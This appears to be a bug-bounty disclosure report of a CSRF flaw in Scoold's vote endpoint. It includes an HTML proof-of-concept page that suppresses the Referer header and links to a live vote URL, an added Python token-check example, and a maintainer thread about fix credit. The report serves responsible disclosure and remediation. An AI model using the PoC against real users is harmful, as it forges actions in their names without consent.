Cross-Site Request Forgery (CSRF) in erudika/scoold
Reported on Jun 20th 2021
Description
The /voteup/question/* endpoint has no CSRF protection. An attacker could exploit this to manipulate the votes on a question.
Proof of Concept
An attacker creates the following web page and sends a link to a logged-in user.
// PoC.html
<html>
<head>
<!-- suppresses the Referer header, so a Referer-based check alone would not see where the request came from -->
<meta name="referrer" content="no-referrer">
</head>
<body>
<!-- a plain GET link is enough because the endpoint changes state on GET and has no token check -->
<a href="https://live.scoold.com/voteup/question/1279016709126098944">Click Here</a>
</body>
</html>
When an authenticated user clicks the link, a vote is cast on behalf of that user without their knowledge.
Prevention
This attack could be easily prevented by requiring a valid CSRF token with the vote request.
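The check described above, as an added example that is not code from the report or from the Scoold project: a hypothetical vote handler shaped like /voteup/question/{id} that rejects the PoC's plain GET link and any request lacking a session-bound synchronizer token. The secret, session ids and request dictionaries are constructed.

```python
# Added example (not from the report or the Scoold project): a minimal
# synchronizer-token check for a state-changing endpoint shaped like
# /voteup/question/{id}. Names, secret and requests are constructed.
import hashlib
import hmac

SERVER_SECRET = b"constructed-server-secret-do-not-reuse"  # constructed placeholder


def issue_csrf_token(session_id: str) -> str:
    """Token bound to the session; the server embeds it only in its own pages."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_voteup(request: dict, session_id: str) -> tuple:
    """Hypothetical vote handler. `session_id` comes from the session cookie,
    which the browser attaches to cross-site requests automatically, so the
    cookie alone proves nothing about who initiated the request."""
    # 1. A state change must not be reachable with a plain GET (the PoC link).
    if request["method"] != "POST":
        return 405, "voting requires POST"
    # 2. The token must be present and match this session's token. A page on
    #    another origin cannot read it, so a forged request cannot supply it.
    supplied = request.get("headers", {}).get("X-CSRF-Token") or request.get("form", {}).get("_csrf")
    if not supplied or not hmac.compare_digest(supplied, issue_csrf_token(session_id)):
        return 403, "missing or invalid CSRF token"
    question_id = request["path"].rsplit("/", 1)[-1]
    return 200, f"vote recorded for question {question_id}"


# Constructed requests. The first is exactly what the PoC link produces.
POC_LINK_REQUEST = {"method": "GET", "path": "/voteup/question/1279016709126098944"}
# A cross-site POST without the token fails too: the attacker never learns the token.
CROSS_SITE_POST = {"method": "POST", "path": "/voteup/question/1279016709126098944", "form": {}}


def legitimate_request(session_id: str) -> dict:
    """What the application's own vote button sends: POST plus the session's token."""
    return {"method": "POST", "path": "/voteup/question/1279016709126098944",
            "form": {"_csrf": issue_csrf_token(session_id)}}


if __name__ == "__main__":
    for name, req in [("PoC link", POC_LINK_REQUEST), ("cross-site POST", CROSS_SITE_POST),
                      ("legitimate", legitimate_request("sess-1"))]:
        print(name, handle_voteup(req, "sess-1"))
```

A servlet application would normally get this from a framework filter such as Spring Security's CsrfFilter rather than a hand-written check, but the rule enforced is the same.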
Hey @oomb, since I couldn't find a security policy or contact email address on the repository, I've created an issue asking for a way to responsibly inform them of this vulnerability. Waiting to hear back, good job!
Thank you Alex! May I kindly ask whether there is a reason that you wished not to claim the fix bounty? Your feedback would be much appreciated, thanks 🙏
I still can't understand how this site works... Are these rewards supposed to support maintainers for fixes like this? Anyways, our projects are fully funded by our backing company so that reward is irrelevant to me.
Also I've just noticed that my profile says "0 fixes" - how come?
Hello Alex, we allow the maintainer to select themselves as the fixer if they patched the vulnerability themselves. When you confirm the fix, you need to just select yourself as the fixer. This will also reflect the fix on your profile.
With regards to the above, do you want this advisory to be marked as valid or invalid?
Thanks for clarifying that Jamie! The report is valid for sure. I was just playing around and managed to click the disabled "mark as invalid" button, which should not have had any effect but it did.
@Alex, apologies for the confusion. From a data perspective, it hasn't actually been reflected as invalid. I will remove the above statuses to prevent confusion when viewing the page.
I will also make sure the "mark as invalid" button is disabled once the status is set.
Yes, that's a good idea. Thanks again for the support!